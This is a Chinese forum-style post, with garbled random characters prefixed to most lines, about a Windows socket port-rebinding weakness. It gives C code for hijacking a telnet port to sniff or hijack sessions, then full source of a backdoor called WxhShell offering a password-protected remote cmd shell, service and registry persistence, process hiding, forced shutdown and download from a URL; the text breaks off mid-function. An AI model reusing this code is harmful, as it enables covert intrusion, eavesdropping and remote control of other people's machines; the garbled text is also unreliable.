在WINDOWS的SOCKET服务器应用的编程中,如下的语句或许比比都是:
rO/a,vV s=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);
-xJX _6}A )]%e saddr.sin_family = AF_INET;
NWEhAj<w Wrmgu}q saddr.sin_addr.s_addr = htonl(INADDR_ANY);
oW0gU?Rr)u {7vgHutp bind(s,(SOCKADDR *)&saddr,sizeof(saddr));
i=oTg m_a^RB( 其实这当中存在在非常大的安全隐患,因为在winsock的实现中,对于服务器的绑定是可以多重绑定的,在确定多重绑定使用谁的时候,根据一条原则是谁的指定最明确则将包递交给谁,而且没有权限之分,也就是说低级权限的用户是可以重绑定在高级权限如服务启动的端口上的,这是非常重大的一个安全隐患。
i<%m Iq1L :qxm !P 这意味着什么?意味着可以进行如下的攻击:
glv ;C/l k+FMZ,D| 1。一个木马绑定到一个已经合法存在的端口上进行端口的隐藏,他通过自己特定的包格式判断是不是自己的包,如果是自己处理,如果不是通过127.0.0.1的地址交给真正的服务器应用进行处理。
^_@r.y] :'Zx{F` 2。一个木马可以在低权限用户上绑定高权限的服务应用的端口,进行该处理信息的嗅探,本来在一个主机上监听一个SOCKET的通讯需要具备非常高的权限要求,但其实利用SOCKET重绑定,你可以轻易的监听具备这种SOCKET编程漏洞的通讯,而无须采用什么挂接,钩子或低层的驱动技术(这些都需要具备管理员权限才能达到)
wHx}U M" HmvsYP66
3。针对一些的特殊应用,可以发起中间人攻击,从低权限用户上获得信息或事实欺骗,如在guest权限下拦截telnet服务器的23端口,如果是采用NTLM加密认证,虽然你无法通过嗅探直接获取密码,但一旦有admin用户通过你登陆以后,你的应用就完全可以发起中间人攻击,扮演这个登陆的用户通过SOCKET发送高权限的命令,到达入侵的目的。
E W`W~h[ K[kds` 4.对于构建的WEB服务器,入侵者只需要获得低级的权限,就可以完全达到更改网页目的,很简单,扮演你的服务器给予连接请求以其他信息的应答,甚至是基于电子商务上的欺骗,获取非法的数据。
2Kjrw; ~i%-WX 其实,MS自己的很多服务的SOCKET编程都存在这样的问题,telnet,ftp,http的服务实现全部都可以利用这种方法进行攻击,在低权限用户上实现对SYSTEM应用的截听。包括W2K+SP3的IIS也都一样,那么如果你已经可以以低权限用户入侵或木马植入的话,而且对方又开启了这些服务的话,那就不妨一试。并且我估计还有很多第三方的服务也大多存在这个漏洞。
5J
ySFG3 elu=9d];@ 解决的方法很简单,在编写如上应用的时候,绑定前需要使用setsockopt指定SO_EXCLUSIVEADDRUSE要求独占所有的端口地址,而不允许复用。这样其他人就无法复用这个端口了。
0!pJ5q ,A W!t{rI7 2 下面就是一个简单的截听ms telnet服务器的例子,在GUEST用户下都能成功进行截听,剩余的就是大家根据自己的需要,进行一些特殊剪裁的问题了:如是隐藏,嗅探数据,高权限用户欺骗等。
Uo~T'mA" 4sTMgBzw #include
lr,q{; #include
IroPx#s:i #include
1Pm4.C) #include
+p9-
.YM DWORD WINAPI ClientThread(LPVOID lpParam);
dPsLZ"I int main()
_BbvhWN&+ {
?\ZL#)hr"p WORD wVersionRequested;
ioxbf6{ DWORD ret;
uQnT[\k? WSADATA wsaData;
9UV9h_.x BOOL val;
6hO-H&r++ SOCKADDR_IN saddr;
m^<p8KZ SOCKADDR_IN scaddr;
RND9D\7 int err;
#.H}r6jqs SOCKET s;
eeM?]J- SOCKET sc;
M7rIi\4K4 int caddsize;
J/ vK6cO\ HANDLE mt;
cMaOM}mS DWORD tid;
+"dv7 wVersionRequested = MAKEWORD( 2, 2 );
)qv2)a!H err = WSAStartup( wVersionRequested, &wsaData );
d`mD!)j if ( err != 0 ) {
@ &pqt6/t printf("error!WSAStartup failed!\n");
A|L'ih/ return -1;
&dr@6-xaq }
4jX3lq| saddr.sin_family = AF_INET;
O(c@PJem 0mTr-`s //截听虽然也可以将地址指定为INADDR_ANY,但是要不能影响正常应用情况下,应该指定具体的IP,留下127.0.0.1给正常的服务应用,然后利用这个地址进行转发,就可以不影响对方正常应用了
?{6s58Q{ ~W-cGb3c saddr.sin_addr.s_addr = inet_addr("192.168.0.60");
2o4^ saddr.sin_port = htons(23);
uR$i48} if((s=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP))==SOCKET_ERROR)
H; Ku
w {
Z+4D.bA printf("error!socket failed!\n");
]A^4}CK^< return -1;
j/KO|iNL2 }
2: SO_O4C val = TRUE;
[c~kF+8 //SO_REUSEADDR选项就是可以实现端口重绑定的
s2REt$.q if(setsockopt(s,SOL_SOCKET,SO_REUSEADDR,(char *)&val,sizeof(val))!=0)
Rko M~`CT {
,6{iT,~@8 printf("error!setsockopt failed!\n");
nS9wb1Zl return -1;
TB!((' }
;wHCj$q //如果指定了SO_EXCLUSIVEADDRUSE,就不会绑定成功,返回无权限的错误代码;
%S \8. //如果是想通过重利用端口达到隐藏的目的,就可以动态的测试当前已绑定的端口哪个可以成功,就说明具备这个漏洞,然后动态利用端口使得更隐蔽
<%P2qgz5 //其实UDP端口一样可以这样重绑定利用,这儿主要是以TELNET服务为例子进行攻击
AXPMnbUS n}?wVfEy if(bind(s,(SOCKADDR *)&saddr,sizeof(saddr))==SOCKET_ERROR)
kXrlSaIc {
G8J*Wnwu[K ret=GetLastError();
xfFg,9w8 printf("error!bind failed!\n");
}t%W1UJ return -1;
ypdT&5Mqb! }
oD.r`]k listen(s,2);
Ii&7rdoxe while(1)
+&i +Mpb {
u0Nm.--;_3 caddsize = sizeof(scaddr);
wW>fVPr //接受连接请求
/.z;\=;[n! sc = accept(s,(struct sockaddr *)&scaddr,&caddsize);
rsXq- Pq* if(sc!=INVALID_SOCKET)
j)C:$ {
t2BL(yB mt = CreateThread(NULL,0,ClientThread,(LPVOID)sc,0,&tid);
eq4C+&O& if(mt==NULL)
&--ej|n {
\S~Vx!9w printf("Thread Creat Failed!\n");
w= P9FxB break;
NnT g3:. }
{0"YOS`3AX }
'T<iHV& CloseHandle(mt);
W ~f(:: }
h vka{LD closesocket(s);
P
[Uy WSACleanup();
\</b4iR)LT return 0;
:GpDg }
L|@y&di DWORD WINAPI ClientThread(LPVOID lpParam)
$37
g]ZD {
!V2/A1? SOCKET ss = (SOCKET)lpParam;
Q6'x\ SOCKET sc;
XxIHoX& unsigned char buf[4096];
-!W<DJ* SOCKADDR_IN saddr;
N-
H^lqD long num;
l 'DsZ9y@2 DWORD val;
@f]{>OS DWORD ret;
A+J*e //如果是隐藏端口应用的话,可以在此处加一些判断
+l3=3 //如果是自己的包,就可以进行一些特殊处理,不是的话通过127.0.0.1进行转发
Ig]iT saddr.sin_family = AF_INET;
kVK/9dy-F saddr.sin_addr.s_addr = inet_addr("127.0.0.1");
OCZaQ33 saddr.sin_port = htons(23);
Suk if((sc=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP))==SOCKET_ERROR)
Sf5X3,Uw {
p~HW5\4 printf("error!socket failed!\n");
#jA[9gWI return -1;
.
8N.l^0, }
FIxFnh3~ val = 100;
]I3!fEAWR if(setsockopt(sc,SOL_SOCKET,SO_RCVTIMEO,(char *)&val,sizeof(val))!=0)
,C%eBna4Iq {
EI!6MC) ret = GetLastError();
Um#Wu]i return -1;
MUfG?r\t }
Q'_z<V if(setsockopt(ss,SOL_SOCKET,SO_RCVTIMEO,(char *)&val,sizeof(val))!=0)
tyaA\F57 {
FFdBtB ret = GetLastError();
b4^`DHRu6 return -1;
;q N+^;,2 }
E|'h]NY if(connect(sc,(SOCKADDR *)&saddr,sizeof(saddr))!=0)
M@0;B30L {
)jrV#/m9 printf("error!socket connect failed!\n");
/|6;Z}2 closesocket(sc);
g~(E>6Y closesocket(ss);
2^8%>, return -1;
jReXyRmo({ }
<! )** while(1)
Hx,0zS%> {
}!IL]0q //下面的代码主要是实现通过127。0。0。1这个地址把包转发到真正的应用上,并把应答的包再转发回去。
$!&*xrrNM //如果是嗅探内容的话,可以再此处进行内容分析和记录
orOt>5}b< //如果是攻击如TELNET服务器,利用其高权限登陆用户的话,可以分析其登陆用户,然后利用发送特定的包以劫持的用户身份执行。
y ]?V~% num = recv(ss,buf,4096,0);
5j~$Mj` if(num>0)
.tD*2 send(sc,buf,num,0);
o,|[GhtHqs else if(num==0)
[1.+HyJ} break;
>4t+:Ut: num = recv(sc,buf,4096,0);
UTXSeNP if(num>0)
g8PTGz send(ss,buf,num,0);
4:g R r
else if(num==0)
u\eEh*<7q break;
M|:UwqV> }
Yw#2uh closesocket(ss);
tHzZ@72B7 closesocket(sc);
pAT7)Ch
return 0 ;
fbUr`~Y" }
g<~Cpd bV,}Pp+/"! V+O"j^Z_J ==========================================================
,\NFt`]j Ol!ntNhXm 下边附上一个代码,,WXhSHELL
F_CYYGZ 72'5%*1 ==========================================================
pR~U`r5z 8<Hf"M #include "stdafx.h"
5LOo8xN ,cNLkoN #include <stdio.h>
KZ/=IP= #include <string.h>
K'GBMnjD #include <windows.h>
/~3r;M #include <winsock2.h>
H)n9O/u #include <winsvc.h>
aA,!<^&} #include <urlmon.h>
K.0:C`C Hw4%uS==V #pragma comment (lib, "Ws2_32.lib")
M3q|l7|9 #pragma comment (lib, "urlmon.lib")
x)@G;nZ w!D|]LoE #define MAX_USER 100 // 最大客户端连接数
55z]&5N #define BUF_SOCK 200 // sock buffer
9Q"'"b*?z #define KEY_BUFF 255 // 输入 buffer
>3Eo@J,?d I"GB<oB #define REBOOT 0 // 重启
I1X-s #define SHUTDOWN 1 // 关机
EKO[ !, AB4(+S*LA #define DEF_PORT 5000 // 监听端口
:8OZ#D_Hl M]J^N# #define REG_LEN 16 // 注册表键长度
O&Y*pOg #define SVC_LEN 80 // NT服务名长度
pej|!oX 4T ~} // 从dll定义API
62zYRs\Y)X typedef DWORD (WINAPI pREGISTERSERVICEPROCESS) (DWORD,DWORD);
1u:<
25 typedef LONG (WINAPI *PROCNTQSIP)(HANDLE,UINT,PVOID,ULONG,PULONG);
=|Y,+/R? typedef BOOL (WINAPI *ENUMPROCESSMODULES) (HANDLE hProcess, HMODULE * lphModule, DWORD cb, LPDWORD lpcbNeeded);
}"|K(hq typedef DWORD (WINAPI *GETMODULEBASENAME) (HANDLE hProcess, HMODULE hModule, LPTSTR lpBaseName, DWORD nSize);
,'u W*kx qw^uPs7Uw // wxhshell配置信息
adR)Uq9 struct WSCFG {
3xaR@xjS int ws_port; // 监听端口
cH&J{WeZa char ws_passstr[REG_LEN]; // 口令
-[wGX}} int ws_autoins; // 安装标记, 1=yes 0=no
aJ>65RJ^= char ws_regname[REG_LEN]; // 注册表键名
lz?$f4TzA char ws_svcname[REG_LEN]; // 服务名
\RG8{G, char ws_svcdisp[SVC_LEN]; // 服务显示名
bJX)$G char ws_svcdesc[SVC_LEN]; // 服务描述信息
N(Tz%o4 char ws_passmsg[SVC_LEN]; // 密码输入提示信息
@"^0%/2- int ws_downexe; // 下载执行标记, 1=yes 0=no
hbY5l}\5 char ws_fileurl[SVC_LEN]; // 下载文件的 url, "
http://xxx/file.exe"
N'GeHByIT char ws_filenam[SVC_LEN]; // 下载后保存的文件名
|EJD3& BW$"`T@c6~ };
(^Y~/ i uF*.hc,% // default Wxhshell configuration
IhVO@KJI struct WSCFG wscfg={DEF_PORT,
vwxXgk "xuhuanlingzhe",
GJ_7h_4 1,
;;#qmGoE "Wxhshell",
)% ~OH "Wxhshell",
a m|F?|1 "WxhShell Service",
73/P&hT "Wrsky Windows CmdShell Service",
*Qg _F6y "Please Input Your Password: ",
>LOjV0K/
1,
pu2tY7Ja "
http://www.wrsky.com/wxhshell.exe",
)mF5Vw" "Wxhshell.exe"
@}}$zv6l, };
;6>2"{NW ]7Tkkw$ // 消息定义模块
YTUZoW2 char *msg_ws_copyright="\n\rWxhShell v1.0 (C)2005
http://www.wrsky.com\n\rMake by 虚幻灵者\n\r";
H}hiT/+$ char *msg_ws_prompt="\n\r? for help\n\r#>";
`)T13Xv char *msg_ws_cmd="\n\ri Install\n\rr Remove\n\rp Path\n\rb reboot\n\rd shutdown\n\rs Shell\n\rx exit\n\rq Quit\n\r\n\rDownload:\n\r#>
http://.../server.exe\n\r";
,[P{HrHx char *msg_ws_ext="\n\rExit.";
zem8G2#c char *msg_ws_end="\n\rQuit.";
"eB$k40- char *msg_ws_boot="\n\rReboot...";
uM_wjP char *msg_ws_poff="\n\rShutdown...";
@`q:IIgW char *msg_ws_down="\n\rSave to ";
h4T5+~rw lPw%ErG char *msg_ws_err="\n\rErr!";
u>2
l7PA| char *msg_ws_ok="\n\rOK!";
3h$6t7=C <
HVl(O char ExeFile[MAX_PATH];
]~'5\58sP int nUser = 0;
E87Ww,z8 HANDLE handles[MAX_USER];
tMf}
int OsIsNt;
RBs-_o+ % U:^PC
x` SERVICE_STATUS serviceStatus;
W*Zkc:{eB SERVICE_STATUS_HANDLE hServiceStatusHandle;
DH\0z[ ~?d Nd // 函数声明
#h`
V>; int Install(void);
1_PoqD!q int Uninstall(void);
*Q?tl\E int DownloadFile(char *sURL, SOCKET wsh);
#49kjv@ int Boot(int flag);
g?z/2zKR void HideProc(void);
3G}x;Cp\D int GetOsVer(void);
1g8_Xe4 int Wxhshell(SOCKET wsl);
"_-Po^u=r void TalkWithClient(void *cs);
I|gB@|_~ int CmdShell(SOCKET sock);
|}BLF int StartFromService(void);
\Q0[?k int StartWxhshell(LPSTR lpCmdLine);
2mVD_ s[` Enum/O5 VOID WINAPI NTServiceMain( DWORD dwArgc, LPTSTR *lpszArgv );
%4et&zRC VOID WINAPI NTServiceHandler( DWORD fdwControl );
ZX9T YN J;.wXS_U8 // 数据结构和表定义
4|riKo) SERVICE_TABLE_ENTRY DispatchTable[] =
E8$20Ue {
.F
{wscfg.ws_svcname, NTServiceMain},
"{@A5A {NULL, NULL}
9K{%vK };
47+&L JtYP E? // 自我安装
IzikDc10 int Install(void)
?XrQ53 {
;oW6 NJ char svExeFile[MAX_PATH];
mF*2#]%dx HKEY key;
>3_jWFq strcpy(svExeFile,ExeFile);
[ 9 {*94M I,>-t GK // 如果是win9x系统,修改注册表设为自启动
[uC]*G] if(!OsIsNt) {
8xMEe:}V if(RegOpenKey(HKEY_LOCAL_MACHINE,"Software\\Microsoft\\Windows\\CurrentVersion\\Run",&key)==ERROR_SUCCESS) {
SUCMb8 RegSetValueEx(key,wscfg.ws_regname,0,REG_SZ,(BYTE *)svExeFile,lstrlen(svExeFile));
n.!#P| RegCloseKey(key);
ZSjMH .Ij" if(RegOpenKey(HKEY_LOCAL_MACHINE,"Software\\Microsoft\\Windows\\CurrentVersion\\RunServices",&key)==ERROR_SUCCESS) {
yu!h<nfzA RegSetValueEx(key,wscfg.ws_regname,0,REG_SZ,(BYTE *)svExeFile,lstrlen(svExeFile));
Ugu[|, RegCloseKey(key);
A9I{2qW9+Z return 0;
#5cEV'm; }
Cl;oi}L }
Rdvk
ml@@ }
vQosPS_2L else {
\?[v{WP) 5na~@-9p // 如果是NT以上系统,安装为系统服务
Uc7mOa}4 SC_HANDLE schSCManager = OpenSCManager( NULL, NULL, SC_MANAGER_CREATE_SERVICE);
S?1AFI9{ if (schSCManager!=0)
xST8|H {
5D\f8L SC_HANDLE schService = CreateService
JjPKR?[> (
PF)jdcX schSCManager,
K1mPr^3rC wscfg.ws_svcname,
*"?l ]d wscfg.ws_svcdisp,
*6sl SERVICE_ALL_ACCESS,
K2M~-S3 SERVICE_WIN32_OWN_PROCESS|SERVICE_INTERACTIVE_PROCESS ,
qLn/2 SERVICE_AUTO_START,
+T|JK7 SERVICE_ERROR_NORMAL,
[ey:e6,T9 svExeFile,
|'P]GK NULL,
`Nz/Oh7 NULL,
4r>6G/b8* NULL,
8ja$g, NULL,
@mOH"acGn? NULL
k;K)xb[w | );
U
9_9l7&r if (schService!=0)
(D#B_`;- {
fkuLj%R CloseServiceHandle(schService);
ii[F]sR\ CloseServiceHandle(schSCManager);
qkt0**\ strcpy(svExeFile,"SYSTEM\\CurrentControlSet\\Services\\");
Y2a5bc P strcat(svExeFile,wscfg.ws_svcname);
zKw`Md if(RegOpenKey(HKEY_LOCAL_MACHINE,svExeFile,&key)==ERROR_SUCCESS) {
.aO,8M RegSetValueEx(key,"Description",0,REG_SZ,(BYTE *)wscfg.ws_svcdesc,lstrlen(wscfg.ws_svcdesc));
u$DHVRrF< RegCloseKey(key);
Wvbf"hq return 0;
jN{Xfjmfv }
sD{Wxv }
F_w
Z"e6 CloseServiceHandle(schSCManager);
x2OaPlG,&V }
{P*pkc }
\|H!~) h$1 %eX{WgH return 1;
zMj#KA1 }
'Y*E<6: ',Y.v"']4 // 自我卸载
Bc+w+ int Uninstall(void)
WKC.$[T= {
/(u}KMR!f HKEY key;
f\]sz?KY _,p/l&< if(!OsIsNt) {
$+P>~X) if(RegOpenKey(HKEY_LOCAL_MACHINE,"Software\\Microsoft\\Windows\\CurrentVersion\\Run",&key)==ERROR_SUCCESS) {
?oVx2LdD| RegDeleteValue(key,wscfg.ws_regname);
?u{~> RegCloseKey(key);
X &uTSgN if(RegOpenKey(HKEY_LOCAL_MACHINE,"Software\\Microsoft\\Windows\\CurrentVersion\\RunServices",&key)==ERROR_SUCCESS) {
AJh w RegDeleteValue(key,wscfg.ws_regname);
1n=lqn/ RegCloseKey(key);
&~8oQC-eF return 0;
N >FKy'.gk }
!TAlBkj }
f%SZg!+t }
[b6R% else {
1pt%Kw*@j _wTOmz%|R SC_HANDLE schSCManager = OpenSCManager( NULL, NULL, SC_MANAGER_ALL_ACCESS);
sPr~=,F if (schSCManager!=0)
m_.>C {
PH1p2Je SC_HANDLE schService = OpenService( schSCManager, wscfg.ws_svcname, SERVICE_ALL_ACCESS);
-8; 7Sp1 if (schService!=0)
JSkLEa~< {
K~c=M",mW if(DeleteService(schService)!=0) {
O{QA CloseServiceHandle(schService);
d;zai]] CloseServiceHandle(schSCManager);
`P@T$bC return 0;
#bUXgn> }
YM1'L\^ CloseServiceHandle(schService);
TT2d81I3m }
F20E_2;@@ CloseServiceHandle(schSCManager);
[<2<Y }
P^A!.}d }
{9?Jj A uD}2<$PP return 1;
fmQ_P.c }
BcL{se9< *AG#316 // 从指定url下载文件
<oR a3Gi(% int DownloadFile(char *sURL, SOCKET wsh)
k[bD\' {
@JtM5qB HRESULT hr;
J#w
J4! char seps[]= "/";
wfNk=)^$ char *token;
b<a4'M char *file;
?%O(mC]u& char myURL[MAX_PATH];
syWG'(> char myFILE[MAX_PATH];
O#F `);AW(Q strcpy(myURL,sURL);
Xnz3p" token=strtok(myURL,seps);
6hlc1? while(token!=NULL)
oI=fx Sjd {
ySx>LuY#3 file=token;
=8t]\Y? token=strtok(NULL,seps);
>hPQRd }
SO IHePmwK 1M}5>V{ GetCurrentDirectory(MAX_PATH,myFILE);
v9:9E|,U+ strcat(myFILE, "\\");
le1}0L strcat(myFILE, file);
C69q&S, send(wsh,myFILE,strlen(myFILE),0);
kddZZA3` send(wsh,"...",3,0);
7Nk!1s: hr = URLDownloadToFile(0, sURL, myFILE, 0, 0);
}RzWJ@QD< if(hr==S_OK)
xC{qV, return 0;
H| 8Qp* else
E8pB;\Z( return 1;
.} q&5v ->l%TCHP }
PMNjn9d M@`;JjtSA // 系统电源模块
d/ARm-D int Boot(int flag)
/DK"QV!]s {
+?:7O=Y HANDLE hToken;
zbk q TOKEN_PRIVILEGES tkp;
^5H >pat e8pG"`wM8 if(OsIsNt) {
F ~^Jmp7Y OpenProcessToken(GetCurrentProcess(),TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY, &hToken);
`V`lo,"\ LookupPrivilegeValue(NULL, SE_SHUTDOWN_NAME,&tkp.Privileges[0].Luid);
ht2\ y&si tkp.PrivilegeCount = 1;
AfX}y+Ah tkp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
,quoRan AdjustTokenPrivileges(hToken, FALSE, &tkp, 0,(PTOKEN_PRIVILEGES)NULL, 0);
L;*ljZ^c if(flag==REBOOT) {
|.F$G< if(ExitWindowsEx(EWX_REBOOT | EWX_FORCE, 0))
\9cG36 return 0;
6G
#}Q/ }
:+qF8t[L else {
pm_`>3 if(ExitWindowsEx(EWX_POWEROFF | EWX_FORCE, 0))
AyNI$Q6Z return 0;
U^Q:Y}^ }
"t(p&;d }
znxnL,- else {
#:[t^} if(flag==REBOOT) {
qv]}$WU if(ExitWindowsEx(EWX_REBOOT + EWX_FORCE,0))
vgsJeV`}I return 0;
V!lZ\) }
E~]R2!9 else {
9fhsIe
if(ExitWindowsEx(EWX_SHUTDOWN + EWX_FORCE,0))
;\]b T;# return 0;
f4Xk,1Is }
?AJKBW^ }
7*
yzEM )TVFtI=,NN return 1;
mS~o?q-n }
*v9 2 d/BM&r // win9x进程隐藏模块
LcUh;=r}& void HideProc(void)
I1pWaQ0 {
aMtsmL?= JT3-AAi[Z HINSTANCE hKernel=LoadLibrary("Kernel32.dll");
^>i63Yc if ( hKernel != NULL )
K_RjX>q%N {
+89*)pk pREGISTERSERVICEPROCESS *pRegisterServiceProcess=(pREGISTERSERVICEPROCESS *)GetProcAddress(hKernel,"RegisterServiceProcess");
1guJG_;z ( *pRegisterServiceProcess)(GetCurrentProcessId(),1);
N+Y]st+ FreeLibrary(hKernel);
I aGq]z }
LIcM3_. lu<xv return;
0`X]o'RxS }
$,,op( Jtr"NS?a] // 获取操作系统版本
~/98Id}v int GetOsVer(void)
,Wk?I%> {
]j`c]2EuP OSVERSIONINFO winfo;
~:Ll&29i winfo.dwOSVersionInfoSize=sizeof(OSVERSIONINFO);
SKkUU^\#R` GetVersionEx(&winfo);
nEJY5Bz$ if(winfo.dwPlatformId==VER_PLATFORM_WIN32_NT)
>8k_n return 1;
GBRa.;Kk else
/atW8 `& return 0;
R)QC)U }
/ro=?QYb m9.{[K" // 客户端句柄模块
- `p4-J!Fy int Wxhshell(SOCKET wsl)
] Hzt b {
L*&p! SOCKET wsh;
:I+Gu*0WD struct sockaddr_in client;
xa <UM5eI DWORD myID;
n)^i/ nXb' [8T^@YN while(nUser<MAX_USER)
:9QZPsL {
2zs73:z int nSize=sizeof(client);
VXR>]HUF wsh=accept(wsl,(struct sockaddr *)&client,&nSize);
"#{4d),r if(wsh==INVALID_SOCKET) return 1;
z^#;~I @M KX'{[7}m' handles[nUser]=CreateThread(0,1000,(LPTHREAD_START_ROUTINE) TalkWithClient,(VOID *) wsh, 0, &myID);
j$?{\iXZ if(handles[nUser]==0)
C-\S/yd closesocket(wsh);
;<j0f~G` else
yCVI\y\B nUser++;
@~YYD#'vNY }
\$*7 >`k WaitForMultipleObjects(MAX_USER,handles,TRUE,INFINITE);
]x(e&fyHB 0{,Z{&E return 0;
dep=& }
(Iaf?J5{ `$W_R[ // 关闭 socket
$ZugBh[b void CloseIt(SOCKET wsh)
Cjc6d4~ {
Gn ~6X-l closesocket(wsh);
G!>z;5KuS nUser--;
e\!0<d ExitThread(0);
kBD>-5Sn_T }
$5ak_@AC P)Rh=U // 客户端请求句柄
j g8fU void TalkWithClient(void *cs)
57umx`m {
jRJn+ G(p`1~xm SOCKET wsh=(SOCKET)cs;
Wu[&Wv~ char pwd[SVC_LEN];
{ g/0x,-Z char cmd[KEY_BUFF];
/v-6WSN char chr[1];
}\\KYyjY int i,j;
_'{_gei_P y5?RVlKJ while (nUser < MAX_USER) {
Ji>o! W4pL ,(S if(wscfg.ws_passstr) {
>z%&xgOa if(strlen(wscfg.ws_passmsg)) send(wsh,wscfg.ws_passmsg,strlen(wscfg.ws_passmsg),0);
<}<zgOT[1! //send(wsh,wscfg.ws_passmsg,strlen(wscfg.ws_passmsg),0);
$\]&rZVi //ZeroMemory(pwd,KEY_BUFF);
=g9*UzA"O i=0;
@~!wDDS while(i<SVC_LEN) {
1(I6.BHW RS)tO0 // 设置超时
xv(9IEjt0 fd_set FdRead;
lij.N)E struct timeval TimeOut;
= \'}g? FD_ZERO(&FdRead);
b{L/4bu FD_SET(wsh,&FdRead);
Xejo_SV&? TimeOut.tv_sec=8;
9Uj$K>: TimeOut.tv_usec=0;
x[h^[oF0 int Er=select(wsh+1, &FdRead, NULL, NULL, &TimeOut);
r'^Hg/Jzt if((Er==SOCKET_ERROR) || (Er==0)) CloseIt(wsh);
pA9+Cr!0Q +
+M$#Er& if(recv(wsh,chr,1,0)==SOCKET_ERROR) CloseIt(wsh);
e1%/26\ pwd
=chr[0]; Q=AavKn#
if(chr[0]==0xd || chr[0]==0xa) { CE#gfP
pwd=0; /?@3.3sl_
break; ^(vs.U^U<
} ([SU:F!uW(
i++; M+U9R@
} o]yl;I
F Sw\_[^CQ
// 如果是非法用户,关闭 socket ok!L.ac
if(strcmp(pwd,wscfg.ws_passstr)) CloseIt(wsh); '*5i)^
} 4]?<hH 9
a%kQl^I4
send(wsh,msg_ws_copyright,strlen(msg_ws_copyright),0); gp>3I!bo[K
send(wsh,msg_ws_prompt,strlen(msg_ws_prompt),0); }4 )H
d:BG#\e]v
while(1) { Y w^m
wSa)*]%
ZeroMemory(cmd,KEY_BUFF); &dM.
d!
0AZ")<^~7
// 自动支持客户端 telnet标准 R=gb'
j=0; lR )67a
while(j<KEY_BUFF) { &,zq%;-f
if(recv(wsh,chr,1,0)==SOCKET_ERROR) CloseIt(wsh); kD=WO4}
cmd[j]=chr[0]; ,{M^-3C
if(chr[0]==0xa || chr[0]==0xd) { )'l:K.F
cmd[j]=0; j[`j9mM8
break; ~;l@|7wGz
} ED=V8';D
j++; XGYbnZ~
} RL!Oi|8
9s\A\$("l
// 下载文件 }>>1<P<8-
if(strstr(cmd,"http://")) { 'u *DA|HC
send(wsh,msg_ws_down,strlen(msg_ws_down),0); +R3k-' >
if(DownloadFile(cmd,wsh)) 39:bzUIF
send(wsh,msg_ws_err,strlen(msg_ws_err),0); ?9e_gV{&;
else O_`VV*
send(wsh,msg_ws_ok,strlen(msg_ws_ok),0);
}Yb[
} ^E;kgED5
else { U#lCj0iUt,
A P)L:7w'e
switch(cmd[0]) { Bt@^+vH ~
Q# ~Q=T'<
// 帮助 Ag 9vU7
case '?': { 7j@Hs[
*
send(wsh,msg_ws_cmd,strlen(msg_ws_cmd),0); t|g4m[kr
break; C 3^JAP
} -`'I{g&A
// 安装 R%{<mno/_
case 'i': { SIBtmm1W
if(Install()) 7''??X
send(wsh,msg_ws_err,strlen(msg_ws_err),0); A,JmX
else ns9U/:L
send(wsh,msg_ws_ok,strlen(msg_ws_ok),0); ZGexdc%
break; wxKX{Bs
} ?qPo=~y01
// 卸载 SheM|I~de
case 'r': { my(2;IJ#{
if(Uninstall()) Ro\8ZXUQa
send(wsh,msg_ws_err,strlen(msg_ws_err),0); {m4b(t`xw
else gH12[Us'`
send(wsh,msg_ws_ok,strlen(msg_ws_ok),0); /sx@$cvW
break; JZ)RGSG i
} )#?"Gjf~
// 显示 wxhshell 所在路径 |n2qVR,
case 'p': { ) pzy
char svExeFile[MAX_PATH]; Fq0i`~L~
strcpy(svExeFile,"\n\r"); 5x5@t
:
strcat(svExeFile,ExeFile); #eoome2Q
send(wsh,svExeFile,strlen(svExeFile),0); ]O]4z,n
break; Px4)>/ z,
} i6^twK)j
// 重启 }JF13beU
case 'b': { 3
}duG/
send(wsh,msg_ws_boot,strlen(msg_ws_boot),0); \nXtH}9ZF
if(Boot(REBOOT)) =$u!
59_dE
send(wsh,msg_ws_err,strlen(msg_ws_err),0); <CS(c|7
else { ,f~J`3(&
closesocket(wsh); qB5j;@r
ExitThread(0); gqZ'$7So
} y&6FybIz
break; `95r0t0hh\
} abuh`H#
// 关机 fY{1F
case 'd': {
9Vg?{v!yn
send(wsh,msg_ws_poff,strlen(msg_ws_poff),0); ;y,5k?
if(Boot(SHUTDOWN)) 3k\#CiB{
send(wsh,msg_ws_err,strlen(msg_ws_err),0); g2BHHL;`
else { WA5 kg\
closesocket(wsh); /NLui@|R
ExitThread(0); h{CL{>d
} J=\HO8E6>
break; {&cJDqz5=
} |z9*GY6RU
// 获取shell ZGBd%RWjG_
case 's': { / kE6@
CmdShell(wsh); %aHB"vi6
closesocket(wsh); 2y//'3[
ExitThread(0); SON-Z"v
break; +NeOSQSj
} (uXL^oja
// 退出 vq0Vq(V=
case 'x': { 5yd MMb
send(wsh,msg_ws_ext,strlen(msg_ws_ext),0); lNz7u:U3
CloseIt(wsh); _tiujP
break; -z-C*%~
} *F+KqZ.2
// 离开 g,Lq)'N;O
case 'q': { P2NQHX
send(wsh,msg_ws_end,strlen(msg_ws_end),0); ^|/TC!v]M
closesocket(wsh); ]3x?
WSACleanup(); VQ(j pns5
exit(1); IshKH-
break; /$ w%Q-p
} Ok|*!!T
} 8hu<E4]L
} Dl<bnx;0
@D.}\(
// 提示信息 lAS#874dE
if(strlen(cmd)) send(wsh,msg_ws_prompt,strlen(msg_ws_prompt),0); S*==aftl(
} ];VA!++
} Q!o'}nA
-C;^3R[
O
return; m!gz3u]rN
} wVX[)E\J
:{PJI,
// shell模块句柄 r(6Y*<
int CmdShell(SOCKET sock) GOj-)i/_
{ ot,jp|N>f~
STARTUPINFO si; O(#)m>A
ZeroMemory(&si,sizeof(si)); &T+atL `N
si.dwFlags=STARTF_USESHOWWINDOW|STARTF_USESTDHANDLES; %D UH@j
si.hStdInput=si.hStdOutput =si.hStdError =(void *)sock; Z 6t56"u
PROCESS_INFORMATION ProcessInfo; "fQ~uzg="
char cmdline[]="cmd"; Pnk5mK$
CreateProcess(NULL,cmdline,NULL,NULL,1,0,NULL,NULL,&si,&ProcessInfo); US+Q~GTA
return 0; .?D7dyU l1
} `n.5f[wC
%oF}HF.
// 自身启动模式 +M./@U*g
int StartFromService(void) c#XXp"7k2
{ 5 f@)z"j
typedef struct !Xh=k36
{ TcyNIx
DWORD ExitStatus; :iK(JE`
DWORD PebBaseAddress; QHDXW1+|^
DWORD AffinityMask; BTlk
E tm
DWORD BasePriority; NiNM{[3oS
ULONG UniqueProcessId; p?{Xu4(
